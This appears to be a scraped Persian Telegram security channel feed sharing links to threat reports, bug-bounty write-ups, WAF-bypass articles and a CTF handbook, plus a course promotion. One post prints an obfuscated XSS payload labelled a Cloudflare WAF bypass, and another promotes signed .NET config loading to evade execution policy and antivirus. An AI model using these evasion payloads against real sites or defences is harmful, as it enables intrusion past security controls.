به نقل از اولترا آموز : 💲 میانگین درآمد ماهانه حوزه های تخصصی تهاجمی و تدافعی در سال 2023
@Engineer_Computer
@Engineer_Computer
❤2👍2👎1🤣1
⭕️ دو هفته دسترسی رایگان
🖥 به تمام دورههای سایت 365DataScience
🔥 دسترسی رایگان به تمام دورههای علوم داده
✅ بدون هیچگونه محدودیتی!
🗓 از 6 نوامبر تا 20 نوامبر
👨🏻💻 سایت 365DataScience از 6 نوامبر به مدت دو هفته، دسترسی رایگان و نامحدود به تمامی دورههای علوم داده رو، بدون هیچ گونه محدودیتی و نیازی به کارت اعتباری ایجاد کرده! 💯
🟣 از همین امروز! فرصت دارین تا با ایجاد فقط یک حساب کاربری با یک ایمیل، رایگان به تمام دورههای علوم داده سایت 365DataScience دسترسی داشته باشین.
🎯 با گذروندن این دورهها میتونین یه نقشه راه کاملا منظم رو تجربه کنین، با تمرینهای عملی دانشتون رو محک بزنین، روی پروژههای دادههای دنیای واقعی کار کنین و در نعایت گواهینامههای شناخته شده و کاملا معتبر رو بدون هیچ هزینهای دریافت کنید.
📌 لینک دسترسی به دورههای 365DataScience:👇🏼
┌ 🏷 Free Access Week | Nov 6 – Nov 20
└ 🚀 All Data & AI Courses 100% FREE
#️⃣ #علم_داده #DataScience
➖➖➖➖➖
@Engineer_Computer
🖥 به تمام دورههای سایت 365DataScience
🔥 دسترسی رایگان به تمام دورههای علوم داده
✅ بدون هیچگونه محدودیتی!
🗓 از 6 نوامبر تا 20 نوامبر
👨🏻💻 سایت 365DataScience از 6 نوامبر به مدت دو هفته، دسترسی رایگان و نامحدود به تمامی دورههای علوم داده رو، بدون هیچ گونه محدودیتی و نیازی به کارت اعتباری ایجاد کرده! 💯
🟣 از همین امروز! فرصت دارین تا با ایجاد فقط یک حساب کاربری با یک ایمیل، رایگان به تمام دورههای علوم داده سایت 365DataScience دسترسی داشته باشین.
🎯 با گذروندن این دورهها میتونین یه نقشه راه کاملا منظم رو تجربه کنین، با تمرینهای عملی دانشتون رو محک بزنین، روی پروژههای دادههای دنیای واقعی کار کنین و در نعایت گواهینامههای شناخته شده و کاملا معتبر رو بدون هیچ هزینهای دریافت کنید.
📌 لینک دسترسی به دورههای 365DataScience:👇🏼
┌ 🏷 Free Access Week | Nov 6 – Nov 20
└ 🚀 All Data & AI Courses 100% FREE
#️⃣ #علم_داده #DataScience
➖➖➖➖➖
@Engineer_Computer
❤3
لیست اکسپلویت های که APT گروه های چینی از سال 2021 تاکنون گمان میرود استفاده کردند
گزارش recorded future
https://www.recordedfuture.com/charting-chinas-climb-leading-global-cyber-power
@Engineer_Computer
گزارش recorded future
https://www.recordedfuture.com/charting-chinas-climb-leading-global-cyber-power
@Engineer_Computer
12 تا 20 سال حبس در انتظار هکر روسی که به ارتش سایبری اوکراین کمک میکرد و توسط سرویس fsb دستگیر شده است.
https://t.co/Vepil0tlAA
@Engineer_Computer
https://t.co/Vepil0tlAA
@Engineer_Computer
BleepingComputer
FSB arrests Russian hackers working for Ukrainian cyber forces
Russia's security agency published a press release on Tuesday saying that its officers detained two hackers who either assisted or joined Ukraine's hackers in cyber operations.
یک مقاله تحقیقاتی ارزشمند در خصوص مشکلات در فرآیند مدیریت آسیب پذیری در جهان
https://blog.aquasec.com/50-shades-of-vulnerabilities-uncovering-flaws-in-open-source-vulnerability-disclosures
@Engineer_Computer
https://blog.aquasec.com/50-shades-of-vulnerabilities-uncovering-flaws-in-open-source-vulnerability-disclosures
@Engineer_Computer
Aqua
50 Shades of Vulnerabilities: Uncovering Flaws in Open-Source Vulnerability Disclosures
Nautilus researchers evaluated the disclosure process of open-source projects and found flaws that allowed harvesting the vulnerabilities before patched
سوء استفاده از ابزار سرویس سرتیفیکیت اکتیو
https://www.blackhillsinfosec.com/abusing-active-directory-certificate-services-part-3/
@Engineer_Computer
https://www.blackhillsinfosec.com/abusing-active-directory-certificate-services-part-3/
@Engineer_Computer
Black Hills Information Security, Inc.
Abusing Active Directory Certificate Services (Part 3) - Black Hills Information Security, Inc.
| Alyssa Snow In PART ONE and PART TWO of this blog series, we discussed common misconfigurations of Active Directory certificate templates. In this post, we will walk through exploitation […]
🗒 Cloudflare bypass WAF
Payload:
<inpuT autofocus oNFocus="setTimeout(function() { /*\*/top['al'+'\u0065'+'rt']([!+[]+!+[]]+[![]+[]][+[]])/*\*/ }, 5000);"></inpuT%3E&lT;/stYle&lT;/titLe&lT;/teXtarEa&lT;/scRipt&gT;
@Engineer_Computer
Payload:
<inpuT autofocus oNFocus="setTimeout(function() { /*\*/top['al'+'\u0065'+'rt']([!+[]+!+[]]+[![]+[]][+[]])/*\*/ }, 5000);"></inpuT%3E&lT;/stYle&lT;/titLe&lT;/teXtarEa&lT;/scRipt&gT;
@Engineer_Computer
🗒 Telegram bug bounties XSS, privacy issues, official bot exploitation
https://davtur19.medium.com/telegram-bug-bounties-xss-privacy-issues-official-bot-exploitation-and-more-5277fa78435
@Engineer_Computer
https://davtur19.medium.com/telegram-bug-bounties-xss-privacy-issues-official-bot-exploitation-and-more-5277fa78435
@Engineer_Computer
🗒 3 tricks to bypass Cloudflare WAF in file upload
https://medium.com/numen-cyber-labs/3-tricks-to-bypass-cloudflare-waf-in-file-upload-9abb83530cfc
@Engineer_Computer
https://medium.com/numen-cyber-labs/3-tricks-to-bypass-cloudflare-waf-in-file-upload-9abb83530cfc
@Engineer_Computer
Medium
3 tricks to bypass Cloudflare WAF in file upload
For Cloudflare customers, having Cloudflare is like paying a peace of mind insurance that your system will get 99% protection against…
This media is not supported in your browser
VIEW IN TELEGRAM
RCE of Burp Scanner / Crawler via Clickjacking
https://hackerone.com/reports/1274695
@Engineer_Computer
https://hackerone.com/reports/1274695
@Engineer_Computer
Handbook for CTFers.pdf
45.9 MB
🗒 Handbook for CTF
@Engineer_Computer
@Engineer_Computer
⭕️ یکی از راه های دور زدن execution policy و AV ها استفاده از فایل های SIGN شده توسط کمپانی های معتبر است.
در لینک زیر یک لیست مناسب از Net Application. های مورد تایید Microsoft جمع آوری شده ، که ما میتوانیم با استفاده از فایل های Config. فایل های DLL را فراخوانی کنیم به طوری که از قبل مورد تایید قرار گرفته باشد.
https://github.com/Mr-Un1k0d3r/.NetConfigLoader
#RedTeam #MalDev
@Engineer_Computer
در لینک زیر یک لیست مناسب از Net Application. های مورد تایید Microsoft جمع آوری شده ، که ما میتوانیم با استفاده از فایل های Config. فایل های DLL را فراخوانی کنیم به طوری که از قبل مورد تایید قرار گرفته باشد.
https://github.com/Mr-Un1k0d3r/.NetConfigLoader
#RedTeam #MalDev
@Engineer_Computer
GitHub
GitHub - Mr-Un1k0d3r/.NetConfigLoader: .net config loader
.net config loader. Contribute to Mr-Un1k0d3r/.NetConfigLoader development by creating an account on GitHub.
This media is not supported in your browser
VIEW IN TELEGRAM
⭕️ افزونه ی مرورگر AI nuclei
قبلا سرویس Nuclei AI رو در کانال معرفی کرده بودیم.
حال، افزونه Nuclei AI میتواند با انتخاب کردن متن CVE های جدید در توییتر (یا صفحات وب دیگر) از سرویس Nuclei AI استفاده کند و تمپلیت nuclei مورد نظر را بسازد.
اپشن های این افزونه عبارتند از:
- تبدیل گزارش باگ بانتی HackerOne به تمپلیت Nuclei ( همچنین پشتیبانی برای پلتفرم های دیگر مانند BugCrowd / Intigriti / Synack نیز اضافه میشود )
- تبدیل اکسپلویت های ExploitDB به تمپلیت Nuclei
لینک افزونه:
🔗 https://github.com/projectdiscovery/nuclei-ai-extension
#nuclei #automation
@Engineer_Computer
قبلا سرویس Nuclei AI رو در کانال معرفی کرده بودیم.
حال، افزونه Nuclei AI میتواند با انتخاب کردن متن CVE های جدید در توییتر (یا صفحات وب دیگر) از سرویس Nuclei AI استفاده کند و تمپلیت nuclei مورد نظر را بسازد.
اپشن های این افزونه عبارتند از:
- تبدیل گزارش باگ بانتی HackerOne به تمپلیت Nuclei ( همچنین پشتیبانی برای پلتفرم های دیگر مانند BugCrowd / Intigriti / Synack نیز اضافه میشود )
- تبدیل اکسپلویت های ExploitDB به تمپلیت Nuclei
لینک افزونه:
🔗 https://github.com/projectdiscovery/nuclei-ai-extension
#nuclei #automation
@Engineer_Computer
https://www.tecmint.com/online-cron-job-generator-and-tester-for-linux/
#linux
#usefull_links
@Engineer_Computer
#linux
#usefull_links
@Engineer_Computer
5 Online Tools for Generating and Testing Cron Jobs for Linux
5 Best Online Cron Job Generators for Linux
As a Linux system administrator, you can perform time-based scheduling of jobs using online cron job services or Cron, a powerful utility in Unix/Linux systems.